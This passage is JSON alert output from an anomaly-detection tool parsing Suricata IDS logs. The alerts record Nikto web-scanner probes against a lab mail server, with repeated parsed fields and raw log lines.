message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80", "/parser/model/time": 1583349514.134229, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46766, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.134416, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": 
"\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46766, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1832280276994169, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err 
message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80", "/parser/model/time": 1583349514.138294, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46768, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TPF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.138485, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46768, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1112705751193243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80", "/parser/model/time": 1583349514.154534, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46770, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SSIFilter", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.154766, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":124996417115902,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46770, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", 